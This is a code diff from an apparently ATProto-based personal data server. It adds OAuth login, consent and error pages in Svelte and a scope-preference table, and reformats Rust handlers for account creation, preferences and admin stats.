scopes]} 190 + <div class="scope-group"> 191 + <h3 class="category-title">{category}</h3> 192 + {#each scopes as scope} 193 + <label class="scope-item" class:required={scope.required}> 194 + <input 195 + type="checkbox" 196 + checked={scopeSelections[scope.scope]} 197 + disabled={scope.required || submitting} 198 + onchange={() => handleScopeToggle(scope.scope)} 199 + /> 200 + <div class="scope-info"> 201 + <span class="scope-name">{scope.display_name}</span> 202 + <span class="scope-description">{scope.description}</span> 203 + {#if scope.required} 204 + <span class="required-badge">Required</span> 205 + {/if} 206 + </div> 207 + </label> 208 + {/each} 209 + </div> 210 + {/each} 211 + </div> 212 + 213 + <label class="remember-choice"> 214 + <input type="checkbox" bind:checked={rememberChoice} disabled={submitting} /> 215 + <span>Remember my choice for this application</span> 216 + </label> 217 + 218 + <div class="actions"> 219 + <button type="button" class="deny-btn" onclick={handleDeny} disabled={submitting}> 220 + Deny 221 + </button> 222 + <button type="button" class="approve-btn" onclick={submitConsent} disabled={submitting}> 223 + {submitting ? 'Authorizing...' : 'Authorize'} 224 + </button> 225 + </div> 226 + {/if} 227 + </div> 228 + 229 + <style> 230 + .consent-container { 231 + max-width: 480px; 232 + margin: 2rem auto; 233 + padding: 2rem; 234 + } 235 + 236 + .loading { 237 + display: flex; 238 + align-items: center; 239 + justify-content: center; 240 + min-height: 200px; 241 + color: var(--text-secondary); 242 + } 243 + 244 + .error-container { 245 + text-align: center; 246 + } 247 + 248 + .error { 249 + padding: 0.75rem; 250 + background: var(--error-bg); 251 + border: 1px solid var(--error-border); 252 + border-radius: 4px; 253 + color: var(--error-text); 254 + margin-bottom: 1rem; 255 + } 256 + 257 + .client-info { 258 + text-align: center; 259 + margin-bottom: 1.5rem; 260 + } 261 + 262 + .client-logo { 263 + width: 64px; 264 + height: 64px; 265 + border-radius: 12px; 266 + margin-bottom: 1rem; 267 + } 268 + 269 + .client-info h1 { 270 + margin: 0 0 0.25rem 0; 271 + font-size: 1.5rem; 272 + } 273 + 274 + .subtitle { 275 + color: var(--text-secondary); 276 + margin: 0; 277 + } 278 + 279 + .client-link { 280 + display: inline-block; 281 + margin-top: 0.5rem; 282 + font-size: 0.875rem; 283 + color: var(--accent); 284 + text-decoration: none; 285 + } 286 + 287 + .client-link:hover { 288 + text-decoration: underline; 289 + } 290 + 291 + .account-info { 292 + display: flex; 293 + flex-direction: column; 294 + gap: 0.25rem; 295 + padding: 1rem; 296 + background: var(--bg-secondary); 297 + border-radius: 8px; 298 + margin-bottom: 1.5rem; 299 + } 300 + 301 + .account-info .label { 302 + font-size: 0.75rem; 303 + color: var(--text-muted); 304 + text-transform: uppercase; 305 + letter-spacing: 0.05em; 306 + } 307 + 308 + .account-info .did { 309 + font-family: monospace; 310 + font-size: 0.875rem; 311 + color: var(--text-primary); 312 + word-break: break-all; 313 + } 314 + 315 + .scopes-section { 316 + margin-bottom: 1.5rem; 317 + } 318 + 319 + .scopes-section h2 { 320 + font-size: 1rem; 321 + margin: 0 0 1rem 0; 322 + color: var(--text-secondary); 323 + } 324 + 325 + .scope-group { 326 + margin-bottom: 1rem; 327 + } 328 + 329 + .category-title { 330 + font-size: 0.875rem; 331 + font-weight: 600; 332 + color: var(--text-primary); 333 + margin: 0 0 0.5rem 0; 334 + padding-bottom: 0.25rem; 335 + border-bottom: 1px solid var(--border-color); 336 + } 337 + 338 + .scope-item { 339 + display: flex; 340 + gap: 0.75rem; 341 + padding: 0.75rem; 342 + background: var(--bg-card); 343 + border: 1px solid var(--border-color); 344 + border-radius: 6px; 345 + margin-bottom: 0.5rem; 346 + cursor: pointer; 347 + transition: border-color 0.15s; 348 + } 349 + 350 + .scope-item:hover:not(.required) { 351 + border-color: var(--accent); 352 + } 353 + 354 + .scope-item.required { 355 + background: var(--bg-secondary); 356 + } 357 + 358 + .scope-item input[type="checkbox"] { 359 + flex-shrink: 0; 360 + width: 18px; 361 + height: 18px; 362 + margin-top: 2px; 363 + } 364 + 365 + .scope-info { 366 + flex: 1; 367 + display: flex; 368 + flex-direction: column; 369 + gap: 0.125rem; 370 + } 371 + 372 + .scope-name { 373 + font-weight: 500; 374 + color: var(--text-primary); 375 + } 376 + 377 + .scope-description { 378 + font-size: 0.875rem; 379 + color: var(--text-secondary); 380 + } 381 + 382 + .required-badge { 383 + display: inline-block; 384 + font-size: 0.625rem; 385 + padding: 0.125rem 0.375rem; 386 + background: var(--warning-bg); 387 + color: var(--warning-text); 388 + border-radius: 3px; 389 + text-transform: uppercase; 390 + letter-spacing: 0.05em; 391 + margin-top: 0.25rem; 392 + width: fit-content; 393 + } 394 + 395 + .remember-choice { 396 + display: flex; 397 + align-items: center; 398 + gap: 0.5rem; 399 + margin-bottom: 1.5rem; 400 + cursor: pointer; 401 + color: var(--text-secondary); 402 + font-size: 0.875rem; 403 + } 404 + 405 + .remember-choice input { 406 + width: 16px; 407 + height: 16px; 408 + } 409 + 410 + .actions { 411 + display: flex; 412 + gap: 1rem; 413 + } 414 + 415 + .actions button { 416 + flex: 1; 417 + padding: 0.875rem; 418 + border: none; 419 + border-radius: 6px; 420 + font-size: 1rem; 421 + font-weight: 500; 422 + cursor: pointer; 423 + transition: background-color 0.15s; 424 + } 425 + 426 + .actions button:disabled { 427 + opacity: 0.6; 428 + cursor: not-allowed; 429 + } 430 + 431 + .deny-btn { 432 + background: var(--bg-secondary); 433 + color: var(--text-primary); 434 + border: 1px solid var(--border-color); 435 + } 436 + 437 + .deny-btn:hover:not(:disabled) { 438 + background: var(--error-bg); 439 + border-color: var(--error-border); 440 + color: var(--error-text); 441 + } 442 + 443 + .approve-btn { 444 + background: var(--accent); 445 + color: white; 446 + } 447 + 448 + .approve-btn:hover:not(:disabled) { 449 + background: var(--accent-hover); 450 + } 451 + </style>
+81
frontend/src/routes/OAuthError.svelte
··· 1 + <script lang="ts"> 2 + function getError(): string { 3 + const params = new URLSearchParams(window.location.hash.split('?')[1] || '') 4 + return params.get('error') || 'Unknown error' 5 + } 6 + 7 + function getErrorDescription(): string | null { 8 + const params = new URLSearchParams(window.location.hash.split('?')[1] || '') 9 + return params.get('error_description') 10 + } 11 + 12 + function handleBack() { 13 + window.history.back() 14 + } 15 + 16 + let error = $derived(getError()) 17 + let errorDescription = $derived(getErrorDescription()) 18 + </script> 19 + 20 + <div class="oauth-error-container"> 21 + <h1>Authorization Error</h1> 22 + 23 + <div class="error-box"> 24 + <div class="error-code">{error}</div> 25 + {#if errorDescription} 26 + <div class="error-description">{errorDescription}</div> 27 + {/if} 28 + </div> 29 + 30 + <button type="button" onclick={handleBack}> 31 + Go Back 32 + </button> 33 + </div> 34 + 35 + <style> 36 + .oauth-error-container { 37 + max-width: 400px; 38 + margin: 4rem auto; 39 + padding: 2rem; 40 + text-align: center; 41 + } 42 + 43 + h1 { 44 + margin: 0 0 1.5rem 0; 45 + color: var(--error-text); 46 + } 47 + 48 + .error-box { 49 + padding: 1.5rem; 50 + background: var(--error-bg); 51 + border: 1px solid var(--error-border); 52 + border-radius: 8px; 53 + margin-bottom: 1.5rem; 54 + } 55 + 56 + .error-code { 57 + font-family: monospace; 58 + font-size: 1rem; 59 + color: var(--error-text); 60 + margin-bottom: 0.5rem; 61 + } 62 + 63 + .error-description { 64 + color: var(--text-secondary); 65 + font-size: 0.875rem; 66 + } 67 + 68 + button { 69 + padding: 0.75rem 1.5rem; 70 + background: var(--accent); 71 + color: white; 72 + border: none; 73 + border-radius: 4px; 74 + font-size: 1rem; 75 + cursor: pointer; 76 + } 77 + 78 + button:hover { 79 + background: var(--accent-hover); 80 + } 81 + </style>
+269
frontend/src/routes/OAuthLogin.svelte
··· 1 + <script lang="ts"> 2 + import { navigate } from '../lib/router.svelte' 3 + 4 + let username = $state('') 5 + let password = $state('') 6 + let rememberDevice = $state(false) 7 + let submitting = $state(false) 8 + let error = $state<string | null>(null) 9 + 10 + function getRequestUri(): string | null { 11 + const params = new URLSearchParams(window.location.hash.split('?')[1] || '') 12 + return params.get('request_uri') 13 + } 14 + 15 + function getErrorFromUrl(): string | null { 16 + const params = new URLSearchParams(window.location.hash.split('?')[1] || '') 17 + return params.get('error') 18 + } 19 + 20 + $effect(() => { 21 + const urlError = getErrorFromUrl() 22 + if (urlError) { 23 + error = urlError 24 + } 25 + }) 26 + 27 + async function handleSubmit(e: Event) { 28 + e.preventDefault() 29 + const requestUri = getRequestUri() 30 + if (!requestUri) { 31 + error = 'Missing request_uri parameter' 32 + return 33 + } 34 + 35 + submitting = true 36 + error = null 37 + 38 + try { 39 + const response = await fetch('/oauth/authorize', { 40 + method: 'POST', 41 + headers: { 42 + 'Content-Type': 'application/json', 43 + 'Accept': 'application/json' 44 + }, 45 + body: JSON.stringify({ 46 + request_uri: requestUri, 47 + username, 48 + password, 49 + remember_device: rememberDevice 50 + }) 51 + }) 52 + 53 + const data = await response.json() 54 + 55 + if (!response.ok) { 56 + error = data.error_description || data.error || 'Login failed' 57 + submitting = false 58 + return 59 + } 60 + 61 + if (data.needs_2fa) { 62 + navigate(`/oauth/2fa?request_uri=${encodeURIComponent(requestUri)}&channel=${encodeURIComponent(data.channel || '')}`) 63 + return 64 + } 65 + 66 + if (data.redirect_uri) { 67 + window.location.href = data.redirect_uri 68 + return 69 + } 70 + 71 + error = 'Unexpected response from server' 72 + submitting = false 73 + } catch { 74 + error = 'Failed to connect to server' 75 + submitting = false 76 + } 77 + } 78 + 79 + async function handleCancel() { 80 + const requestUri = getRequestUri() 81 + if (!requestUri) { 82 + window.history.back() 83 + return 84 + } 85 + 86 + submitting = true 87 + try { 88 + const response = await fetch('/oauth/authorize/deny', { 89 + method: 'POST', 90 + headers: { 91 + 'Content-Type': 'application/json', 92 + 'Accept': 'application/json' 93 + }, 94 + body: JSON.stringify({ request_uri: requestUri }) 95 + }) 96 + 97 + const data = await response.json() 98 + if (data.redirect_uri) { 99 + window.location.href = data.redirect_uri 100 + } 101 + } catch { 102 + window.history.back() 103 + } 104 + } 105 + </script> 106 + 107 + <div class="oauth-login-container"> 108 + <h1>Sign In</h1> 109 + <p class="subtitle">Sign in to continue to the application</p> 110 + 111 + {#if error} 112 + <div class="error">{error}</div> 113 + {/if} 114 + 115 + <form onsubmit={handleSubmit}> 116 + <div class="field"> 117 + <label for="username">Handle or Email</label> 118 + <input 119 + id="username" 120 + type="text" 121 + bind:value={username} 122 + placeholder="you@example.com or handle" 123 + disabled={submitting} 124 + required 125 + autocomplete="username" 126 + /> 127 + </div> 128 + 129 + <div class="field"> 130 + <label for="password">Password</label> 131 + <input 132 + id="password" 133 + type="password" 134 + bind:value={password} 135 + disabled={submitting} 136 + required 137 + autocomplete="current-password" 138 + /> 139 + </div> 140 + 141 + <label class="remember-device"> 142 + <input type="checkbox" bind:checked={rememberDevice} disabled={submitting} /> 143 + <span>Remember this device</span> 144 + </label> 145 + 146 + <div class="actions"> 147 + <button type="button" class="cancel-btn" onclick={handleCancel} disabled={submitting}> 148 + Cancel 149 + </button> 150 + <button type="submit" class="submit-btn" disabled={submitting || !username || !password}> 151 + {submitting ? 'Signing in...' : 'Sign In'} 152 + </button> 153 + </div> 154 + </form> 155 + </div> 156 + 157 + <style> 158 + .oauth-login-container { 159 + max-width: 400px; 160 + margin: 4rem auto; 161 + padding: 2rem; 162 + } 163 + 164 + h1 { 165 + margin: 0 0 0.5rem 0; 166 + } 167 + 168 + .subtitle { 169 + color: var(--text-secondary); 170 + margin: 0 0 2rem 0; 171 + } 172 + 173 + form { 174 + display: flex; 175 + flex-direction: column; 176 + gap: 1rem; 177 + } 178 + 179 + .field { 180 + display: flex; 181 + flex-direction: column; 182 + gap: 0.25rem; 183 + } 184 + 185 + label { 186 + font-size: 0.875rem; 187 + font-weight: 500; 188 + } 189 + 190 + input[type="text"], 191 + input[type="password"] { 192 + padding: 0.75rem; 193 + border: 1px solid var(--border-color-light); 194 + border-radius: 4px; 195 + font-size: 1rem; 196 + background: var(--bg-input); 197 + color: var(--text-primary); 198 + } 199 + 200 + input:focus { 201 + outline: none; 202 + border-color: var(--accent); 203 + } 204 + 205 + .remember-device { 206 + display: flex; 207 + align-items: center; 208 + gap: 0.5rem; 209 + cursor: pointer; 210 + color: var(--text-secondary); 211 + font-size: 0.875rem; 212 + } 213 + 214 + .remember-device input { 215 + width: 16px; 216 + height: 16px; 217 + } 218 + 219 + .error { 220 + padding: 0.75rem; 221 + background: var(--error-bg); 222 + border: 1px solid var(--error-border); 223 + border-radius: 4px; 224 + color: var(--error-text); 225 + margin-bottom: 1rem; 226 + } 227 + 228 + .actions { 229 + display: flex; 230 + gap: 1rem; 231 + margin-top: 0.5rem; 232 + } 233 + 234 + .actions button { 235 + flex: 1; 236 + padding: 0.75rem; 237 + border: none; 238 + border-radius: 4px; 239 + font-size: 1rem; 240 + cursor: pointer; 241 + transition: background-color 0.15s; 242 + } 243 + 244 + .actions button:disabled { 245 + opacity: 0.6; 246 + cursor: not-allowed; 247 + } 248 + 249 + .cancel-btn { 250 + background: var(--bg-secondary); 251 + color: var(--text-primary); 252 + border: 1px solid var(--border-color); 253 + } 254 + 255 + .cancel-btn:hover:not(:disabled) { 256 + background: var(--error-bg); 257 + border-color: var(--error-border); 258 + color: var(--error-text); 259 + } 260 + 261 + .submit-btn { 262 + background: var(--accent); 263 + color: white; 264 + } 265 + 266 + .submit-btn:hover:not(:disabled) { 267 + background: var(--accent-hover); 268 + } 269 + </style>
+12
migrations/20251221_oauth_scope_preferences.sql
··· 1 + CREATE TABLE oauth_scope_preference ( 2 + id UUID PRIMARY KEY DEFAULT gen_random_uuid(), 3 + did TEXT NOT NULL REFERENCES users(did) ON DELETE CASCADE, 4 + client_id TEXT NOT NULL, 5 + scope TEXT NOT NULL, 6 + granted BOOLEAN NOT NULL DEFAULT TRUE, 7 + created_at TIMESTAMPTZ NOT NULL DEFAULT NOW(), 8 + updated_at TIMESTAMPTZ NOT NULL DEFAULT NOW(), 9 + UNIQUE(did, client_id, scope) 10 + ); 11 + 12 + CREATE INDEX idx_oauth_scope_pref_lookup ON oauth_scope_preference(did, client_id);
+33 -29
src/api/actor/preferences.rs
··· 32 32 .into_response(); 33 33 } 34 34 }; 35 - let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 36 - Ok(user) => user, 37 - Err(_) => { 38 - return ( 39 - StatusCode::UNAUTHORIZED, 40 - Json(json!({"error": "AuthenticationFailed"})), 41 - ) 42 - .into_response(); 43 - } 44 - }; 35 + let auth_user = 36 + match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 37 + Ok(user) => user, 38 + Err(_) => { 39 + return ( 40 + StatusCode::UNAUTHORIZED, 41 + Json(json!({"error": "AuthenticationFailed"})), 42 + ) 43 + .into_response(); 44 + } 45 + }; 45 46 let user_id: uuid::Uuid = 46 47 match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", auth_user.did) 47 48 .fetch_optional(&state.db) ··· 109 110 .into_response(); 110 111 } 111 112 }; 112 - let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 113 - Ok(user) => user, 114 - Err(_) => { 113 + let auth_user = 114 + match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 115 + Ok(user) => user, 116 + Err(_) => { 117 + return ( 118 + StatusCode::UNAUTHORIZED, 119 + Json(json!({"error": "AuthenticationFailed"})), 120 + ) 121 + .into_response(); 122 + } 123 + }; 124 + let (user_id, is_migration): (uuid::Uuid, bool) = match sqlx::query!( 125 + "SELECT id, deactivated_at FROM users WHERE did = $1", 126 + auth_user.did 127 + ) 128 + .fetch_optional(&state.db) 129 + .await 130 + { 131 + Ok(Some(row)) => (row.id, row.deactivated_at.is_some()), 132 + _ => { 115 133 return ( 116 - StatusCode::UNAUTHORIZED, 117 - Json(json!({"error": "AuthenticationFailed"})), 134 + StatusCode::INTERNAL_SERVER_ERROR, 135 + Json(json!({"error": "InternalError", "message": "User not found"})), 118 136 ) 119 137 .into_response(); 120 138 } 121 139 }; 122 - let (user_id, is_migration): (uuid::Uuid, bool) = 123 - match sqlx::query!("SELECT id, deactivated_at FROM users WHERE did = $1", auth_user.did) 124 - .fetch_optional(&state.db) 125 - .await 126 - { 127 - Ok(Some(row)) => (row.id, row.deactivated_at.is_some()), 128 - _ => { 129 - return ( 130 - StatusCode::INTERNAL_SERVER_ERROR, 131 - Json(json!({"error": "InternalError", "message": "User not found"})), 132 - ) 133 - .into_response(); 134 - } 135 - }; 136 140 if input.preferences.len() > MAX_PREFERENCES_COUNT { 137 141 return ( 138 142 StatusCode::BAD_REQUEST,
+2 -3
src/api/admin/account/info.rs
··· 93 93 .map(|q| { 94 94 q.split('&') 95 95 .filter_map(|pair| { 96 - let mut parts = pair.splitn(2, '='); 97 - let k = parts.next()?; 98 - let v = parts.next()?; 96 + let (k, v) = pair.split_once('=')?; 97 + 99 98 if k == key { 100 99 Some(urlencoding::decode(v).ok()?.into_owned()) 101 100 } else {
+27 -13
src/api/admin/account/search.rs
··· 54 54 let limit = params.limit.clamp(1, 100); 55 55 let cursor_did = params.cursor.as_deref().unwrap_or(""); 56 56 let handle_filter = params.handle.as_deref().map(|h| format!("%{}%", h)); 57 - let result = sqlx::query_as::<_, (String, String, Option<String>, chrono::DateTime<chrono::Utc>, bool, Option<chrono::DateTime<chrono::Utc>>)>( 57 + let result = sqlx::query_as::< 58 + _, 59 + ( 60 + String, 61 + String, 62 + Option<String>, 63 + chrono::DateTime<chrono::Utc>, 64 + bool, 65 + Option<chrono::DateTime<chrono::Utc>>, 66 + ), 67 + >( 58 68 r#" 59 69 SELECT did, handle, email, created_at, email_verified, deactivated_at 60 70 FROM users ··· 74 84 let accounts: Vec<AccountView> = rows 75 85 .into_iter() 76 86 .take(limit as usize) 77 - .map(|(did, handle, email, created_at, email_verified, deactivated_at)| AccountView { 78 - did: did.clone(), 79 - handle, 80 - email, 81 - indexed_at: created_at.to_rfc3339(), 82 - email_verified_at: if email_verified { 83 - Some(created_at.to_rfc3339()) 84 - } else { 85 - None 87 + .map( 88 + |(did, handle, email, created_at, email_verified, deactivated_at)| { 89 + AccountView { 90 + did: did.clone(), 91 + handle, 92 + email, 93 + indexed_at: created_at.to_rfc3339(), 94 + email_verified_at: if email_verified { 95 + Some(created_at.to_rfc3339()) 96 + } else { 97 + None 98 + }, 99 + deactivated_at: deactivated_at.map(|dt| dt.to_rfc3339()), 100 + invites_disabled: None, 101 + } 86 102 }, 87 - deactivated_at: deactivated_at.map(|dt| dt.to_rfc3339()), 88 - invites_disabled: None, 89 - }) 103 + ) 90 104 .collect(); 91 105 let next_cursor = if has_more { 92 106 accounts.last().map(|a| a.did.clone())
+10 -12
src/api/admin/server_stats.rs
··· 16 16 pub blob_storage_bytes: i64, 17 17 } 18 18 19 - pub async fn get_server_stats( 20 - State(state): State<AppState>, 21 - _auth: BearerAuthAdmin, 22 - ) -> Response { 19 + pub async fn get_server_stats(State(state): State<AppState>, _auth: BearerAuthAdmin) -> Response { 23 20 let user_count: i64 = match sqlx::query_scalar!("SELECT COUNT(*) FROM users") 24 21 .fetch_one(&state.db) 25 22 .await ··· 47 44 Err(_) => 0, 48 45 }; 49 46 50 - let blob_storage_bytes: i64 = match sqlx::query_scalar!("SELECT COALESCE(SUM(size_bytes), 0)::BIGINT FROM blobs") 51 - .fetch_one(&state.db) 52 - .await 53 - { 54 - Ok(Some(bytes)) => bytes, 55 - Ok(None) => 0, 56 - Err(_) => 0, 57 - }; 47 + let blob_storage_bytes: i64 = 48 + match sqlx::query_scalar!("SELECT COALESCE(SUM(size_bytes), 0)::BIGINT FROM blobs") 49 + .fetch_one(&state.db) 50 + .await 51 + { 52 + Ok(Some(bytes)) => bytes, 53 + Ok(None) => 0, 54 + Err(_) => 0, 55 + }; 58 56 59 57 Json(ServerStatsResponse { 60 58 user_count,
+164 -147
src/api/identity/account.rs
··· 21 21 fn extract_client_ip(headers: &HeaderMap) -> String { 22 22 if let Some(forwarded) = headers.get("x-forwarded-for") 23 23 && let Ok(value) = forwarded.to_str() 24 - && let Some(first_ip) = value.split(',').next() { 25 - return first_ip.trim().to_string(); 26 - } 24 + && let Some(first_ip) = value.split(',').next() 25 + { 26 + return first_ip.trim().to_string(); 27 + } 27 28 if let Some(real_ip) = headers.get("x-real-ip") 28 - && let Ok(value) = real_ip.to_str() { 29 - return value.trim().to_string(); 30 - } 29 + && let Ok(value) = real_ip.to_str() 30 + { 31 + return value.trim().to_string(); 32 + } 31 33 "unknown".to_string() 32 34 } 33 35 ··· 114 116 }; 115 117 116 118 let is_migration = migration_auth.is_some() 117 - && input.did.as_ref().map(|d| d.starts_with("did:plc:")).unwrap_or(false); 119 + && input 120 + .did 121 + .as_ref() 122 + .map(|d| d.starts_with("did:plc:")) 123 + .unwrap_or(false); 118 124 119 125 if is_migration { 120 126 let migration_did = input.did.as_ref().unwrap(); ··· 147 153 .map(|e| e.trim().to_string()) 148 154 .filter(|e| !e.is_empty()); 149 155 if let Some(ref email) = email 150 - && !crate::api::validation::is_valid_email(email) { 151 - return ( 152 - StatusCode::BAD_REQUEST, 153 - Json(json!({"error": "InvalidEmail", "message": "Invalid email format"})), 154 - ) 155 - .into_response(); 156 - } 156 + && !crate::api::validation::is_valid_email(email) 157 + { 158 + return ( 159 + StatusCode::BAD_REQUEST, 160 + Json(json!({"error": "InvalidEmail", "message": "Invalid email format"})), 161 + ) 162 + .into_response(); 163 + } 157 164 let verification_channel = input.verification_channel.as_deref().unwrap_or("email"); 158 165 let valid_channels = ["email", "discord", "telegram", "signal"]; 159 166 if !valid_channels.contains(&verification_channel) && !is_migration { ··· 366 373 }; 367 374 if is_migration { 368 375 let existing_account: Option<(uuid::Uuid, String, Option<chrono::DateTime<chrono::Utc>>)> = 369 - sqlx::query_as( 370 - "SELECT id, handle, deactivated_at FROM users WHERE did = $1 FOR UPDATE", 371 - ) 372 - .bind(&did) 373 - .fetch_optional(&mut *tx) 374 - .await 375 - .unwrap_or(None); 376 + sqlx::query_as("SELECT id, handle, deactivated_at FROM users WHERE did = $1 FOR UPDATE") 377 + .bind(&did) 378 + .fetch_optional(&mut *tx) 379 + .await 380 + .unwrap_or(None); 376 381 if let Some((account_id, old_handle, deactivated_at)) = existing_account { 377 382 if deactivated_at.is_some() { 378 383 info!(did = %did, old_handle = %old_handle, new_handle = %short_handle, "Preparing existing account for inbound migration"); 379 - let update_result: Result<_, sqlx::Error> = sqlx::query( 380 - "UPDATE users SET handle = $1 WHERE id = $2", 381 - ) 382 - .bind(short_handle) 383 - .bind(account_id) 384 - .execute(&mut *tx) 385 - .await; 384 + let update_result: Result<_, sqlx::Error> = 385 + sqlx::query("UPDATE users SET handle = $1 WHERE id = $2") 386 + .bind(short_handle) 387 + .bind(account_id) 388 + .execute(&mut *tx) 389 + .await; 386 390 if let Err(e) = update_result { 387 - if let Some(db_err) = e.as_database_error() { 388 - if db_err.constraint().map(|c| c.contains("handle")).unwrap_or(false) { 389 - return ( 391 + if let Some(db_err) = e.as_database_error() 392 + && db_err 393 + .constraint() 394 + .map(|c| c.contains("handle")) 395 + .unwrap_or(false) 396 + { 397 + return ( 390 398 StatusCode::BAD_REQUEST, 391 399 Json(json!({"error": "HandleTaken", "message": "Handle already taken by another account"})), 392 400 ) 393 401 .into_response(); 394 - } 395 402 } 396 403 error!("Error reactivating account: {:?}", e); 397 404 return ( ··· 438 445 .into_response(); 439 446 } 440 447 }; 441 - let access_meta = match crate::auth::create_access_token_with_metadata(&did, &secret_key_bytes) { 442 - Ok(m) => m, 443 - Err(e) => { 444 - error!("Error creating access token: {:?}", e); 445 - return ( 446 - StatusCode::INTERNAL_SERVER_ERROR, 447 - Json(json!({"error": "InternalError"})), 448 - ) 449 - .into_response(); 450 - } 451 - }; 452 - let refresh_meta = match crate::auth::create_refresh_token_with_metadata(&did, &secret_key_bytes) { 448 + let access_meta = 449 + match crate::auth::create_access_token_with_metadata(&did, &secret_key_bytes) { 450 + Ok(m) => m, 451 + Err(e) => { 452 + error!("Error creating access token: {:?}", e); 453 + return ( 454 + StatusCode::INTERNAL_SERVER_ERROR, 455 + Json(json!({"error": "InternalError"})), 456 + ) 457 + .into_response(); 458 + } 459 + }; 460 + let refresh_meta = match crate::auth::create_refresh_token_with_metadata( 461 + &did, 462 + &secret_key_bytes, 463 + ) { 453 464 Ok(m) => m, 454 465 Err(e) => { 455 466 error!("Error creating refresh token: {:?}", e); ··· 499 510 } 500 511 } 501 512 } 502 - let exists_result: Option<(i32,)> = sqlx::query_as( 503 - "SELECT 1 FROM users WHERE handle = $1 AND deactivated_at IS NULL", 504 - ) 505 - .bind(short_handle) 506 - .fetch_optional(&mut *tx) 507 - .await 508 - .unwrap_or(None); 513 + let exists_result: Option<(i32,)> = 514 + sqlx::query_as("SELECT 1 FROM users WHERE handle = $1 AND deactivated_at IS NULL") 515 + .bind(short_handle) 516 + .fetch_optional(&mut *tx) 517 + .await 518 + .unwrap_or(None); 509 519 if exists_result.is_some() { 510 520 return ( 511 521 StatusCode::BAD_REQUEST, ··· 516 526 let invite_code_required = std::env::var("INVITE_CODE_REQUIRED") 517 527 .map(|v| v == "true" || v == "1") 518 528 .unwrap_or(false); 519 - if invite_code_required && input.invite_code.as_ref().map(|c| c.trim().is_empty()).unwrap_or(true) { 529 + if invite_code_required 530 + && input 531 + .invite_code 532 + .as_ref() 533 + .map(|c| c.trim().is_empty()) 534 + .unwrap_or(true) 535 + { 520 536 return ( 521 537 StatusCode::BAD_REQUEST, 522 538 Json(json!({"error": "InvalidInviteCode", "message": "Invite code is required"})), 523 539 ) 524 540 .into_response(); 525 541 } 526 - if let Some(code) = &input.invite_code { 527 - if !code.trim().is_empty() { 528 - let invite_query = sqlx::query!( 529 - "SELECT available_uses FROM invite_codes WHERE code = $1 FOR UPDATE", 530 - code 531 - ) 532 - .fetch_optional(&mut *tx) 533 - .await; 534 - match invite_query { 535 - Ok(Some(row)) => { 536 - if row.available_uses <= 0 { 537 - return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidInviteCode", "message": "Invite code exhausted"}))).into_response(); 538 - } 539 - let update_invite = sqlx::query!( 540 - "UPDATE invite_codes SET available_uses = available_uses - 1 WHERE code = $1", 541 - code 542 - ) 543 - .execute(&mut *tx) 544 - .await; 545 - if let Err(e) = update_invite { 546 - error!("Error updating invite code: {:?}", e); 547 - return ( 548 - StatusCode::INTERNAL_SERVER_ERROR, 549 - Json(json!({"error": "InternalError"})), 550 - ) 551 - .into_response(); 552 - } 542 + if let Some(code) = &input.invite_code 543 + && !code.trim().is_empty() 544 + { 545 + let invite_query = sqlx::query!( 546 + "SELECT available_uses FROM invite_codes WHERE code = $1 FOR UPDATE", 547 + code 548 + ) 549 + .fetch_optional(&mut *tx) 550 + .await; 551 + match invite_query { 552 + Ok(Some(row)) => { 553 + if row.available_uses <= 0 { 554 + return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidInviteCode", "message": "Invite code exhausted"}))).into_response(); 553 555 } 554 - Ok(None) => { 555 - return ( 556 - StatusCode::BAD_REQUEST, 557 - Json(json!({"error": "InvalidInviteCode", "message": "Invite code not found"})), 558 - ) 559 - .into_response(); 560 - } 561 - Err(e) => { 562 - error!("Error checking invite code: {:?}", e); 556 + let update_invite = sqlx::query!( 557 + "UPDATE invite_codes SET available_uses = available_uses - 1 WHERE code = $1", 558 + code 559 + ) 560 + .execute(&mut *tx) 561 + .await; 562 + if let Err(e) = update_invite { 563 + error!("Error updating invite code: {:?}", e); 563 564 return ( 564 565 StatusCode::INTERNAL_SERVER_ERROR, 565 566 Json(json!({"error": "InternalError"})), 566 567 ) 567 568 .into_response(); 568 569 } 570 + } 571 + Ok(None) => { 572 + return ( 573 + StatusCode::BAD_REQUEST, 574 + Json(json!({"error": "InvalidInviteCode", "message": "Invite code not found"})), 575 + ) 576 + .into_response(); 577 + } 578 + Err(e) => { 579 + error!("Error checking invite code: {:?}", e); 580 + return ( 581 + StatusCode::INTERNAL_SERVER_ERROR, 582 + Json(json!({"error": "InternalError"})), 583 + ) 584 + .into_response(); 569 585 } 570 586 } 571 587 } ··· 635 651 Ok((id,)) => id, 636 652 Err(e) => { 637 653 if let Some(db_err) = e.as_database_error() 638 - && db_err.code().as_deref() == Some("23505") { 639 - let constraint = db_err.constraint().unwrap_or(""); 640 - if constraint.contains("handle") || constraint.contains("users_handle") { 641 - return ( 642 - StatusCode::BAD_REQUEST, 643 - Json(json!({ 644 - "error": "HandleNotAvailable", 645 - "message": "Handle already taken" 646 - })), 647 - ) 648 - .into_response(); 649 - } else if constraint.contains("email") || constraint.contains("users_email") { 650 - return ( 651 - StatusCode::BAD_REQUEST, 652 - Json(json!({ 653 - "error": "InvalidEmail", 654 - "message": "Email already registered" 655 - })), 656 - ) 657 - .into_response(); 658 - } else if constraint.contains("did") || constraint.contains("users_did") { 659 - return ( 660 - StatusCode::BAD_REQUEST, 661 - Json(json!({ 662 - "error": "AccountAlreadyExists", 663 - "message": "An account with this DID already exists" 664 - })), 665 - ) 666 - .into_response(); 667 - } 654 + && db_err.code().as_deref() == Some("23505") 655 + { 656 + let constraint = db_err.constraint().unwrap_or(""); 657 + if constraint.contains("handle") || constraint.contains("users_handle") { 658 + return ( 659 + StatusCode::BAD_REQUEST, 660 + Json(json!({ 661 + "error": "HandleNotAvailable", 662 + "message": "Handle already taken" 663 + })), 664 + ) 665 + .into_response(); 666 + } else if constraint.contains("email") || constraint.contains("users_email") { 667 + return ( 668 + StatusCode::BAD_REQUEST, 669 + Json(json!({ 670 + "error": "InvalidEmail", 671 + "message": "Email already registered" 672 + })), 673 + ) 674 + .into_response(); 675 + } else if constraint.contains("did") || constraint.contains("users_did") { 676 + return ( 677 + StatusCode::BAD_REQUEST, 678 + Json(json!({ 679 + "error": 